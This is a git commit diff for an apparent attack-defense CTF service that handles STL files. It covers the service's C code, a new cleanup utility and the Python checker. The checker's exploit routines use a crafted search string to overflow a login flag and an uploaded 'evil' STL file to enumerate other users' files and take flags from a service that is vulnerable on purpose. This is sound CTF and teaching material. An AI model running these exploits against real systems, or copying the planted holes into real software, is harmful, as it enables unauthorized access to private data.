commit 8e430a00c145647cf6a67504640bd919af2c4fdf
parent 3139342aa61d78985298d7450f97513a8aeec681
Author: Louis Burda <quent.burda@gmail.com>
Date: Wed, 7 Jul 2021 23:17:31 +0200
stash before adding attack_info for fixing exploit variant 2
Diffstat:
13 files changed, 412 insertions(+), 175 deletions(-)
diff --git a/.github/workflows/enochecker_test.yml b/.github/workflows/enochecker_test.yml
@@ -28,6 +28,10 @@ jobs:
run: |
python -m pip install --upgrade pip
pip install enochecker-test
+ - name: test checker style
+ run: |
+ cd checker
+ make lint
- name: start service
run: |
cd service
diff --git a/checker/local.sh b/checker/local.sh
@@ -11,4 +11,4 @@ export MONGO_PORT=27017
export MONGO_USER=stldoctor_checker
export MONGO_PASSWORD=stldoctor_checker
-python3 src/checker.py $@
+python3 -u src/checker.py $@
diff --git a/checker/src/checker.py b/checker/src/checker.py
@@ -53,7 +53,7 @@ solid test\xff
vertex 0 1 0
endloop
endfacet
-endsolid test\xff
+endsolid
"""
checker = Enochecker("stldoctor", 9090)
@@ -82,7 +82,7 @@ class Session:
return self
async def __aexit__(self, *args: list[Any], **kwargs: dict[str, Any]) -> None:
- await timed(self.exit(), self.logger, ctx="closing session")
+ await timed(self.close(), self.logger, ctx="closing session")
async def readuntil(self, target: bytes, ctx: Optional[str] = None) -> bytes:
try:
@@ -133,25 +133,16 @@ def _get_session(socket: AsyncSocket, logger: LoggerAdapter) -> Session:
return Session(socket, logger)
-def ensure_bytes(v: Union[str, bytes]) -> bytes:
- if type(v) == bytes:
- return v
- elif type(v) == str:
- return v.encode()
- else:
- raise InternalErrorException(f"Tried to convert {type(v)} arg to bytes")
-
-
def includes_all(resp: bytes, targets: list[bytes]) -> bool:
for m in targets:
- if ensure_bytes(m) not in resp:
+ if m not in resp:
return False
return True
def includes_any(resp: bytes, targets: list[bytes]) -> bool:
for m in targets:
- if ensure_bytes(m) in resp:
+ if m in resp:
return True
return False
@@ -420,36 +411,57 @@ async def do_upload(
stlfile: bytes,
check: bool = True,
) -> Optional[bytes]:
- # Upload file
+
session.logger.debug(f"Uploading model with name {modelname!r}")
session.write(b"upload\n")
+
+ # enter name and check resp
session.write(modelname + b"\n")
+ await session.drain()
+ await session.readuntil(b"name: ")
+ resp = await session.read(4, ctx="checking for err response")
+ if resp == b"ERR:":
+ if check:
+ resp = resp + await session.readline()
+ session.logger.critical(f"Failed during name check: {resp!r}")
+ raise MumbleException("File upload not working properly")
+ return None
+
+ # enter size and check resp
+ await session.readuntil(b"size: ")
session.write(f"{len(stlfile)}\n".encode())
- session.write(stlfile)
await session.drain()
+ resp = await session.read(4, ctx="checking for err response")
+ if resp == b"ERR:":
+ if check:
+ resp = resp + await session.readline()
+ session.logger.critical(f"Failed during size check: {resp!r}")
+ raise MumbleException("File upload not working properly")
+ return None
- # Check for errors
- # TODO improve by reading responses separately
- resp = await session.readline(ctx="reading upload response (1)")
- resp += await session.readline(ctx="reading upload response (2)")
+ await session.readuntil(b"listening..\n")
+ session.write(stlfile)
+ await session.drain()
+ resp = await session.readline()
if b"ERR:" in resp:
if check:
- session.logger.critical(f"Failed to upload model {modelname!r}:\n{resp!r}")
+ session.logger.critical(f"Failed during stl parsing: {resp!r}")
raise MumbleException("File upload not working properly")
- await session.readuntil(prompt, ctx="waiting for prompt")
return None
- # Parse ID
+ # parse returned id
try:
modelid = resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1]
if modelid == b"":
raise Exception
except:
session.logger.critical(
- f"Invalid response during upload of {modelname!r}:\n{resp!r}"
+ f"Invalid file size during upload of {modelname!r}:\n{resp!r}"
)
raise MumbleException("File upload not working properly")
+ session.logger.debug(f"Uploaded model id: {modelid!r}")
+
await session.readuntil(prompt, ctx="waiting for prompt")
return modelid
@@ -460,38 +472,38 @@ async def do_search(
download: bool = False,
check: bool = True,
) -> Optional[tuple[bytes, bytes]]:
- modelname = ensure_bytes(modelname)
-
- # Initiate download
session.logger.debug(f"Retrieving model with name {modelname!r}")
+
+ # get possible hashes
session.write(b"search " + modelname + b"\n")
- session.write(b"0\n") # first result
- session.write(b"y\n" if download else b"n\n")
- session.write(b"q\n") # quit
await session.drain()
-
- # Check if an error occured
- line = await session.readline()
- if b"ERR:" in line:
+ resp = await session.readline()
+ if b"ERR:" in resp:
if check:
session.logger.critical(
- f"Failed to retrieve model {modelname!r}:\n{line!r}"
+ f"Failed to retrieve model {modelname!r}:\n{resp!r}"
)
raise MumbleException("File search not working properly")
- if b"Couldn't find a matching scan result" in line:
- # collect all the invalid commands sent after (hacky)
- # TODO: improve by checking every response in search
- await session.readuntil(prompt)
- await session.readuntil(prompt)
- await session.readuntil(prompt)
- await session.readuntil(prompt)
return None
+ resp = resp + await session.readuntil(b"> ")
+ results = [l.strip() for l in resp[:-2].split(b"\n")]
- # read until end of info box
- fileinfo = line + await session.readuntil(
+ # request first result
+ session.write(results[0] + b"\n")
+ await session.drain()
+ resp = await session.readline()
+ if b"ERR:" in resp:
+ if check:
+ session.logger.critical(f"Error selecting file: {results[0]!r}")
+ raise MumbleException("File search not working properly")
+ return None
+ fileinfo = resp + await session.readuntil(
b"================== \n", ctx="reading stl info"
)
+ # download if requested
+ session.write(b"y\n" if download else b"n\n")
+ await session.drain()
stlfile = b""
if download: # Parse file contents
await session.readuntil(b"Here you go.. (", ctx="reading stl size (1)")
@@ -499,13 +511,15 @@ async def do_search(
resp = resp[:-3]
size = parse_int(resp)
if size is None:
- raise MumbleException(
- f"Received invalid download size, response:\n{resp!r}"
- )
-
+ raise MumbleException(f"Invalid download size: {resp!r}")
session.logger.debug(f"Download size: {size}")
stlfile = await session.read(size, ctx="reading stl contents")
+ # only the first result is needed; quit the search prompt
+ session.write(b"q\n")
+ await session.drain()
+
+ # cleanup..
await session.readuntil(prompt)
return fileinfo, stlfile
@@ -513,14 +527,6 @@ async def do_search(
# CHECK WRAPPERS #
-async def check_line(session: Session, context: str) -> bytes:
- line = await session.readline()
- if b"ERR:" in line:
- session.logger.critical(f"{context}: Unexpected error message\n")
- raise MumbleException("Service returned error during valid interaction")
- return line
-
-
async def check_listed(session: Session, includes: list[bytes]) -> bytes:
resp = await do_list(session, check=True)
assert resp is not None
@@ -742,7 +748,8 @@ async def test_bad_upload(di: DependencyInjector, filetype: str, variant: int) -
# Ensure a malformed file causes an error
session = await di.get(Session)
- if await do_upload(session, modelname, stlfile, check=False):
+ resp = await do_upload(session, modelname, stlfile, check=False)
+ if resp is not None:
session.logger.critical(f"Able to upload malformed file:\n{stlfile!r}")
raise MumbleException("Upload validation not working properly")
@@ -754,8 +761,8 @@ async def test_search(di: DependencyInjector, registered: bool = False) -> None:
session = await di.get(Session)
if registered:
await do_auth(session, authstr, check=True)
- if resp := await do_search(session, modelname, download=False, check=False):
- assert resp is not None
+ resp = await do_search(session, modelname, download=False, check=False)
+ if resp is not None:
session.logger.critical(
f"Search for file that shouldn't exist succeeded:\n{resp[0]+resp[1]!r}"
)
@@ -1002,33 +1009,45 @@ async def exploit_prefix_truncation(di: DependencyInjector) -> bytes:
modelname = fakeid()
searcher = await di.get(FlagSearcher)
- # Upload evil file for parse via search for hash truncation
session = await di.get(Session)
session.logger.debug("Uploading evil file for hash truncation")
+
+ # Upload evil file
await do_upload(session, modelname, stlfile=search_truncation_payload, check=True)
search_resp = await do_search(session, modelname, download=False, check=True)
- assert search_resp is not None
- info, contents = search_resp
+ print(search_resp)
+
+ # Retrieve evil file for hash truncation
session.write(b"search last\n")
await session.drain()
- filelist_resp = await session.readuntil(b"? ", ctx="reading search results")
- filelist = [
- l.strip().split(b" : ")[1] for l in filelist_resp.split(b"\n") if b" : " in l
- ]
+ filelist_resp = await session.readuntil(
+ b"[q to quit]: ", ctx="reading search results"
+ )
+ session.logger.critical(filelist_resp)
+ filelist = [l.strip() for l in filelist_resp.split(b"\n")[:-1] if l.strip() != b""]
if len(filelist) == 0:
raise MumbleException("Failed to list files through search")
+ session.logger.critical(filelist)
# Use it to enumerate other files and grab contents
flag = None
- for i, fhash in enumerate(filelist):
- session.logger.debug(f"Retrieving file {fhash} at index {i}")
- session.write(f"{i}\nn\n".encode())
+ for fhash in filelist:
+ session.logger.debug(f"Retrieving file {fhash}")
+ session.write(fhash + b"\n")
+ session.write(b"n\n")
await session.drain()
- filelist_resp = await session.readuntil(
+ resp = await session.readline()
+ if b"ERR:" in resp:
+ session.logger.critical(f"Failed on selection of file: {resp!r}")
+ raise MumbleException("Failed to retrieve file contents via exploit")
+ resp += await session.readuntil(
b"==================", ctx="getting file info (1)"
)
- filelist_resp += await session.readuntil(b"? ", ctx="getting file info (2)")
- if flag := searcher.search_flag(filelist_resp.decode("latin1")):
+ resp += await session.readuntil(
+ b"[q to quit]: ", ctx="getting file info (2)"
+ )
+ session.logger.critical(resp)
+ if flag := searcher.search_flag(resp):
break
# Done!
@@ -1050,7 +1069,7 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None:
session = await di.get(Session)
session.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
await session.drain()
- await session.readuntil(prompt, ctx="getting user hashes via search")
+ await session.readuntil(prompt, ctx="overflowing loggedin via search")
session.write(b"auth\n")
await session.drain()
resp = await session.readuntil(prompt, ctx="checking auth success")
@@ -1058,9 +1077,8 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None:
raise MumbleException("Exploit did not set 'loggedin' variable via overflow")
# Get private user hashes via 'list'
- resp = await do_list(session, check=False)
- if not resp:
- raise MumbleException("")
+ resp = await do_list(session, check=True)
+ session.logger.critical(resp)
users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l]
await session.exit()
@@ -1088,7 +1106,7 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None:
solidnames = b"\n".join(
[l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l]
)
- if flag := searcher.search_flag(solidnames.decode("latin1")):
+ if flag := searcher.search_flag(solidnames):
return flag
raise MumbleException("Exploit for flagstore 2 failed")
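
For orientation, here is a minimal synchronous sketch of the upload dialog the reworked do_upload above now steps through. The send/recv_until/recv_line callables are hypothetical stand-ins for the checker's async Session helpers, and the 4-byte "ERR:" peeks after the name and size prompts are reduced to comments:

```python
from typing import Callable

# Hypothetical, simplified sketch of the per-step upload dialog driven by do_upload.
def upload_sketch(
    send: Callable[[bytes], None],
    recv_until: Callable[[bytes], bytes],
    recv_line: Callable[[], bytes],
    modelname: bytes,
    stlfile: bytes,
) -> bytes:
    send(b"upload\n")
    send(modelname + b"\n")            # name is pipelined; the checker syncs on the prompt next
    recv_until(b"name: ")              # (the real checker peeks 4 bytes here for an "ERR:" reply)
    recv_until(b"size: ")
    send(f"{len(stlfile)}\n".encode())
    recv_until(b"listening..\n")       # (another "ERR:" peek happens before this in the checker)
    send(stlfile)                      # service reads exactly len(stlfile) raw bytes
    resp = recv_line()                 # "... with ID <modelid>!" on success, "ERR: ..." otherwise
    if b"ERR:" in resp:
        raise RuntimeError(f"upload rejected: {resp!r}")
    return resp.rsplit(b"!", 1)[0].split(b"with ID ", 1)[1]
```
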
diff --git a/service/Dockerfile b/service/Dockerfile
@@ -8,16 +8,19 @@ RUN adduser --system --ingroup service --uid 1000 service
COPY entrypoint.sh /
RUN chmod 755 /entrypoint.sh
-COPY cleaner.sh /
-RUN chmod 755 /cleaner.sh
+COPY cleaner /cleaner
+RUN make -C /cleaner clean && make -C /cleaner
+RUN cp /cleaner/cleaner /usr/bin/cleaner
+RUN chmod +x /usr/bin/cleaner
COPY src/ /service/
+RUN make -C /service clean && make -C /service
+RUN chmod +x /service/build/stldoctor
WORKDIR /service/
-RUN make clean && make
-
-EXPOSE 9000
ENV RESULTDIR=/data/uploads
+EXPOSE 9000
+
ENTRYPOINT ["/entrypoint.sh"]
diff --git a/service/cleaner.sh b/service/cleaner.sh
@@ -1,24 +0,0 @@
-#!/bin/sh
-
-timeref="/data/lastclean"
-
-if [ -z "$RESULTDIR" ]; then
- echo "RESULTDIR is undefined! skipping cleanup.."
- exit 1
-fi
-
-if [ -f "$timeref" ]; then
- files="$(find "$RESULTDIR" -mindepth 1 \! -newer "$timeref")"
- echo "$files" | while read path; do
- rm -rf "$path"
- done
- if [ -z "$files" ]; then
- filecount=0
- else
- filecount=$(echo "$files" | wc -l)
- fi
- echo "[ $(date +%T) ] Removed $filecount old files!"
-fi
-
-touch "$timeref"
-
diff --git a/service/cleaner/.gitignore b/service/cleaner/.gitignore
@@ -0,0 +1 @@
+cleaner
diff --git a/service/cleaner/Makefile b/service/cleaner/Makefile
@@ -0,0 +1,7 @@
+all: cleaner
+
+clean:
+ rm -f cleaner
+
+cleaner: main.c
+ $(CC) -o $@ $<
diff --git a/service/cleaner/main.c b/service/cleaner/main.c
@@ -0,0 +1,155 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <stdarg.h>
+#include <string.h>
+
+#include <unistd.h>
+#include <dirent.h>
+#include <time.h>
+#include <sys/file.h>
+#include <sys/stat.h>
+
+void
+die(const char *fmtstr, ...)
+{
+ va_list ap;
+
+ fprintf(stderr, "CLEANER: ");
+ va_start(ap, fmtstr);
+ vfprintf(stderr, fmtstr, ap);
+ va_end(ap);
+
+ exit(EXIT_FAILURE);
+}
+
+int
+creation_time(const char *path)
+{
+ struct stat attrib;
+
+ stat(path, &attrib);
+ return attrib.st_ctim.tv_sec;
+}
+
+char*
+aprintf(const char *fmtstr, ...)
+{
+ va_list ap, cpy;
+ size_t nb;
+ char *str;
+
+ va_start(cpy, fmtstr);
+ nb = vsnprintf(NULL, 0, fmtstr, cpy);
+ va_end(cpy);
+
+ if (nb <= 0) die("Invalid fmtstr!\n");
+ str = malloc(nb+1);
+ if (!str) die("Alloc of fmtstr failed\n");
+
+ va_start(ap, fmtstr);
+ nb = vsnprintf(str, nb+1, fmtstr, ap);
+ va_end(ap);
+
+ return str;
+}
+
+void
+recdel(const char *path)
+{
+ struct stat attrib;
+ struct dirent *de;
+ char *subpath;
+ DIR *d;
+
+ stat(path, &attrib);
+ if (S_ISDIR(attrib.st_mode)) {
+ d = opendir(path);
+ while ((de = readdir(d))) {
+ if (!strcmp(de->d_name, ".") || !strcmp(de->d_name, ".."))
+ continue;
+ subpath = aprintf("%s/%s", path, de->d_name);
+ recdel(subpath);
+ free(subpath);
+ }
+ closedir(d);
+ rmdir(path);
+ } else {
+ remove(path);
+ }
+}
+
+int
+main(int argc, const char **argv)
+{
+ char buf[256], *end, *path,
+ **paths, *oldpath, *newpath;
+ unsigned long reftime;
+ int i, pathc, pathcap, nread;
+ const char *dirpath;
+ FILE *f, *fn;
+
+ if (argc != 3) die("USAGE: cleaner DIR REFTIME\n");
+
+ dirpath = argv[1];
+
+ reftime = strtoul(argv[2], &end, 10);
+ if (end && *end) die("Invalid unix time reference\n");
+
+ oldpath = aprintf("%s/.index", dirpath);
+ if (!(f = fopen(oldpath, "r+")))
+ die("Missing index file: %s\n", oldpath);
+ flock(fileno(f), LOCK_EX);
+
+ newpath = aprintf("%s/.index.next", dirpath);
+ if (!(fn = fopen(newpath, "w+")))
+ die("Failed to create index file: %s\n", newpath);
+
+ pathc = 0;
+ pathcap = 1024;
+ paths = malloc(pathcap * sizeof(char*));
+ if (!paths) die("OOM - allocating initial path array\n");
+
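+ /* entries older than reftime are queued for deletion; the rest go to the staging index */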
+ while (fgets(buf, sizeof(buf), f)) {
+ if (*buf && buf[strlen(buf)-1] == '\n')
+ buf[strlen(buf)-1] = '\0';
+
+ path = aprintf("%s/%s", dirpath, buf);
+ if (creation_time(path) < reftime) {
+ paths[pathc] = strdup(path);
+ if (!paths[pathc++]) die("OOM - during path str alloc\n");
+ if (pathc == pathcap) {
+ pathcap *= 2;
+ paths = realloc(paths, pathcap * sizeof(char*));
+ if (!paths) die("OOM - too many paths to alloc\n");
+ }
+ } else {
+ fwrite(buf, 1, strlen(buf), fn);
+ putc('\n', fn);
+ }
+ free(path);
+ }
+
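+ /* copy the kept entries from the staging index back over the original and truncate it */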
+ fseek(f, 0, SEEK_SET);
+ fseek(fn, 0, SEEK_SET);
+ while ((nread = fread(buf, 1, sizeof(buf), fn)) > 0)
+ fwrite(buf, 1, nread, f);
+ fflush(f);
+ ftruncate(fileno(f), ftell(f));
+
+ nread = ftell(f);
+
+ flock(fileno(f), LOCK_UN);
+ fclose(f);
+ fclose(fn);
+
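+ /* an empty index with DELROOT set: drop the index files so the (per-user) directory can be removed */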
+ if (!nread && getenv("DELROOT")) {
+ remove(oldpath);
+ remove(newpath);
+ }
+
+ for (i = 0; i < pathc; i++) {
+ printf("CLEANER: REMOVED %s\n", paths[i]);
+ recdel(paths[i]);
+ }
+}
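
For cross-reference, a rough Python equivalent of the cleaner's core pass (a sketch only: the .index.next staging file, the flock()-based locking and the DELROOT special case are omitted, and .index is assumed to hold one model directory name per line):

```python
#!/usr/bin/env python3
# Rough, hypothetical Python equivalent of cleaner/main.c: drop index entries
# whose directories are older than reftime, rewrite the index with the rest.
import os
import shutil
import sys

def clean(dirpath: str, reftime: int) -> None:
    index = os.path.join(dirpath, ".index")
    with open(index, "r+") as f:                   # the C version also flock()s this file
        keep, drop = [], []
        for line in f:
            name = line.rstrip("\n")
            if not name:
                continue
            path = os.path.join(dirpath, name)
            ctime = os.stat(path).st_ctime         # st_ctim.tv_sec in the C code
            (drop if ctime < reftime else keep).append((name, path))
        f.seek(0)
        f.writelines(name + "\n" for name, _ in keep)
        f.truncate()
    for _, path in drop:
        print(f"CLEANER: REMOVED {path}")
        shutil.rmtree(path, ignore_errors=True)    # index entries are model directories

if __name__ == "__main__":
    clean(sys.argv[1], int(sys.argv[2]))
```
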
diff --git a/service/entrypoint.sh b/service/entrypoint.sh
@@ -3,10 +3,19 @@
mkdir -p "$RESULTDIR"
chown -R service:service "$RESULTDIR"
+expiry=$((13*60))
while [ 1 ]; do
- /cleaner.sh
- sleep $((60*13)) # data persistence for atleast 11 rounds
+ reftime="$(($(date +%s)-$expiry))"
+ echo "[FILE CLEANUP] @ $(date +%T)"
+ cleaner "$RESULTDIR" "$reftime"
+ DELROOT=1 find "$RESULTDIR" -maxdepth 1 -regextype posix-extended \
+ -regex '.*/\.[^/]+$' ! -name .index ! -name .index.next \
+ -exec cleaner {} "$reftime" \;
+ find "$RESULTDIR" -regextype posix-extended \
+ -regex '.*/\.[^/]+$' -type d -empty -delete
+ sleep 70
done &
-CMD="socat -T180 -s TCP-LISTEN:9000,nodelay,reuseaddr,fork EXEC:/service/build/stldoctor,raw,pty,echo=0,stderr"
+CMD="socat -T180 -s TCP-LISTEN:9000,nodelay,reuseaddr,fork \
+EXEC:/service/build/stldoctor,raw,pty,echo=0,stderr"
su -s /bin/sh -c "$CMD" service
diff --git a/service/src/main.c b/service/src/main.c
@@ -2,7 +2,6 @@
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
-#include <dirent.h>
#include <fcntl.h>
#include <time.h>
#include <errno.h>
@@ -56,7 +55,6 @@ save_submission(struct parseinfo *info, char *stldata, int stlsize)
*indexpath = NULL, *modelpath = NULL;
FILE *f = NULL;
int status = OK;
- DIR *d;
modeldir = aprintf("%s%s-%i", loggedin ? "." : "",
info->hash, time(NULL));
@@ -296,22 +294,28 @@ search_cmd(const char *arg)
while ((c = fgetc(f)) > 0) {
if (c == '\n') {
matchlen = 0;
+ continue;
} else if (matchlen == -1) {
continue;
+ } else if (!matchlen && c == '.') {
+ if (!loggedin) matchlen = -1;
+ continue;
} else if (c == hash[matchlen]) {
matchlen += 1;
- if (matchlen == strlen(hash)) {
- fseek(f, -matchlen, SEEK_CUR);
- putchar(' ');
- while ((c = fgetc(f)) > 0 && c != '\n')
- putchar(c);
- putchar('\n');
- matchlen = 0;
- reslen += 1;
- }
} else {
matchlen = -1;
}
+
+ if (matchlen == strlen(hash)) {
+ fseek(f, -matchlen, SEEK_CUR);
+ putchar(' ');
+ if (loggedin) putchar('.');
+ while ((c = fgetc(f)) > 0 && c != '\n')
+ putchar(c);
+ putchar('\n');
+ matchlen = 0;
+ reslen += 1;
+ }
}
flock(fileno(f), LOCK_UN);
@@ -326,7 +330,7 @@ search_cmd(const char *arg)
resp = ask("> Enter %s [q to quit]: ",
resp ? "another" : "hash");
if (strchr(resp, 'q')) break;
- if (checkalph(resp, "abcdef0123456789-") != OK) {
+ if (checkalph(resp, ".abcdef0123456789-") != OK) {
ERR("Invalid model id specified\n");
goto exit;
}
@@ -345,43 +349,50 @@ exit:
void
list_cmd(const char *arg)
{
- struct dirent *de;
struct parseinfo info;
- char *path;
- FILE *f;
- DIR *d;
+ char buf[256], *path;
+ FILE *f, *fn;
if (!loggedin) {
ERR("Not logged in!\n");
return;
}
- if (!(d = opendir(resultdir))) return;
-
- while ((de = readdir(d))) {
- if (*de->d_name == '.' && !strchr(".", de->d_name[1])) {
- printf(">> %s\n", de->d_name);
- path = aprintf("%s/%s/info", resultdir, de->d_name);
- if ((f = fopen(path, "r")) && load_info(&info, f) == OK) {
- print_info(&info);
- free_info(&info);
- } else {
- ERR("Failed to read file info!\n");
- }
- if (f) fclose(f);
- free(path);
- }
+ path = aprintf("%s/.index", resultdir);
+ if (!(f = fopen(path, "r"))) {
+ ERR("Failed to get files index\n");
+ free(path);
+ return;
}
+ free(path);
- closedir(d);
+ flock(fileno(f), LOCK_SH);
+ while (fgets(buf, sizeof(buf), f)) {
+ if (*buf && buf[strlen(buf)-1] == '\n')
+ buf[strlen(buf)-1] = '\0';
+
+ printf(">> %s\n", buf);
+ path = aprintf("%s/%s/info", resultdir, buf);
+ if ((fn = fopen(path, "r")) && load_info(&info, fn) == OK) {
+ print_info(&info);
+ free_info(&info);
+ } else {
+ ERR("Failed to read file info!\n");
+ }
+ if (fn) fclose(fn);
+ free(path);
+ }
+ flock(fileno(f), LOCK_UN);
+ fclose(f);
}
void
auth_cmd(const char *arg)
{
const char *hash;
- char *ndir;
+ char *ndir, *indexpath;
int ret;
+ FILE *f;
if (loggedin) {
ERR("Already logged in!\n");
@@ -400,6 +411,22 @@ auth_cmd(const char *arg)
return;
}
+ if (errno != EEXIST) {
+ indexpath = aprintf("%s/.index", resultdir);
+ if (!(f = fopen(indexpath, "a+"))) {
+ free(indexpath);
+ ERR("Auth failed!\n");
+ return;
+ }
+ flock(fileno(f), LOCK_EX);
+ fputc('.', f);
+ fwrite(hash, 1, strlen(hash), f);
+ fputc('\n', f);
+ flock(fileno(f), LOCK_UN);
+ fclose(f);
+ free(indexpath);
+ }
+
free(resultdir);
resultdir = ndir;
loggedin = 1;
diff --git a/src/main.c b/src/main.c
@@ -2,7 +2,6 @@
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
-#include <dirent.h>
#include <fcntl.h>
#include <time.h>
#include <errno.h>
@@ -56,7 +55,6 @@ save_submission(struct parseinfo *info, char *stldata, int stlsize)
*indexpath = NULL, *modelpath = NULL;
FILE *f = NULL;
int status = OK;
- DIR *d;
modeldir = aprintf("%s%s-%i", loggedin ? "." : "",
info->hash, time(NULL));
@@ -299,22 +297,28 @@ search_cmd(const char *arg)
while ((c = fgetc(f)) > 0) {
if (c == '\n') {
matchlen = 0;
+ continue;
} else if (matchlen == -1) {
continue;
+ } else if (!matchlen && c == '.') {
+ if (!loggedin) matchlen = -1;
+ continue;
} else if (c == hash[matchlen]) {
matchlen += 1;
- if (matchlen == strlen(hash)) {
- fseek(f, -matchlen, SEEK_CUR);
- putchar(' ');
- while ((c = fgetc(f)) > 0 && c != '\n')
- putchar(c);
- putchar('\n');
- matchlen = 0;
- reslen += 1;
- }
} else {
matchlen = -1;
}
+
+ if (matchlen == strlen(hash)) {
+ fseek(f, -matchlen, SEEK_CUR);
+ putchar(' ');
+ if (loggedin) putchar('.');
+ while ((c = fgetc(f)) > 0 && c != '\n')
+ putchar(c);
+ putchar('\n');
+ matchlen = 0;
+ reslen += 1;
+ }
}
flock(fileno(f), LOCK_UN);
@@ -330,7 +334,7 @@ search_cmd(const char *arg)
resp = ask("> Enter %s [q to quit]: ",
resp ? "another" : "hash");
if (strchr(resp, 'q')) break;
- if (checkalph(resp, "abcdef0123456789-") != OK) {
+ if (checkalph(resp, ".abcdef0123456789-") != OK) {
ERR("Invalid model id specified\n");
goto exit;
}
@@ -349,43 +353,50 @@ exit:
void
list_cmd(const char *arg)
{
- struct dirent *de;
struct parseinfo info;
- char *path;
- FILE *f;
- DIR *d;
+ char buf[256], *path;
+ FILE *f, *fn;
if (!loggedin) {
ERR("Not logged in!\n");
return;
}
- if (!(d = opendir(resultdir))) return;
-
- while ((de = readdir(d))) {
- if (*de->d_name == '.' && !strchr(".", de->d_name[1])) {
- printf(">> %s\n", de->d_name);
- path = aprintf("%s/%s/info", resultdir, de->d_name);
- if ((f = fopen(path, "r")) && load_info(&info, f) == OK) {
- print_info(&info);
- free_info(&info);
- } else {
- ERR("Failed to read file info!\n");
- }
- if (f) fclose(f);
- free(path);
- }
+ path = aprintf("%s/.index", resultdir);
+ if (!(f = fopen(path, "r"))) {
+ ERR("Failed to get files index\n");
+ free(path);
+ return;
}
+ free(path);
- closedir(d);
+ flock(fileno(f), LOCK_SH);
+ while (fgets(buf, sizeof(buf), f)) {
+ if (*buf && buf[strlen(buf)-1] == '\n')
+ buf[strlen(buf)-1] = '\0';
+
+ printf(">> %s\n", buf);
+ path = aprintf("%s/%s/info", resultdir, buf);
+ if ((fn = fopen(path, "r")) && load_info(&info, fn) == OK) {
+ print_info(&info);
+ free_info(&info);
+ } else {
+ ERR("Failed to read file info!\n");
+ }
+ if (fn) fclose(fn);
+ free(path);
+ }
+ flock(fileno(f), LOCK_UN);
+ fclose(f);
}
void
auth_cmd(const char *arg)
{
const char *hash;
- char *ndir;
+ char *ndir, *indexpath;
int ret;
+ FILE *f;
if (loggedin) {
ERR("Already logged in!\n");
@@ -404,6 +415,22 @@ auth_cmd(const char *arg)
return;
}
+ if (errno != EEXIST) {
+ indexpath = aprintf("%s/.index", resultdir);
+ if (!(f = fopen(indexpath, "a+"))) {
+ free(indexpath);
+ ERR("Auth failed!\n");
+ return;
+ }
+ flock(fileno(f), LOCK_EX);
+ fputc('.', f);
+ fwrite(hash, 1, strlen(hash), f);
+ fputc('\n', f);
+ flock(fileno(f), LOCK_UN);
+ fclose(f);
+ free(indexpath);
+ }
+
free(resultdir);
resultdir = ndir;
loggedin = 1;
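
Both copies of main.c now share one convention: .index entries written with a leading '.' belong to authenticated users and are only matched by search/list when loggedin is set, and checkalph additionally accepts '.' so such an entry can be selected at the hash prompt. A small illustrative Python sketch of just the visibility rule (function name and shape are hypothetical):

```python
# Hypothetical illustration of the visibility rule in search_cmd/list_cmd:
# index entries starting with '.' are private and are only matched when the
# session is authenticated; matching ignores the '.' prefix itself.
def visible_matches(index_entries: list[bytes], query: bytes, loggedin: bool) -> list[bytes]:
    hits = []
    for entry in index_entries:
        if entry.startswith(b".") and not loggedin:
            continue                           # anonymous sessions never see '.'-entries
        if entry.lstrip(b".").startswith(query):
            hits.append(entry)
    return hits
```
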
diff --git a/tests/data/evil2.stl b/tests/data/evil2.stl
@@ -0,0 +1,9 @@
+solid test˙3ac
+ facet normal 0 0 1.0
+ outer loop
+ vertex 1 0 0
+ vertex 1 1 0
+ vertex 0 1 0
+ endloop
+ endfacet
+endsolid
diff --git a/tests/test.sh b/tests/test.sh
@@ -89,6 +89,7 @@ elif [ "$1" == "stl-upload" ]; then
name="${3:-samplefile}"
(
echo "echo"
+ [ ! -z "$AUTH" ] && echo "auth $AUTH"
echo "upload"
echo "$name"
cat "$file" | wc -c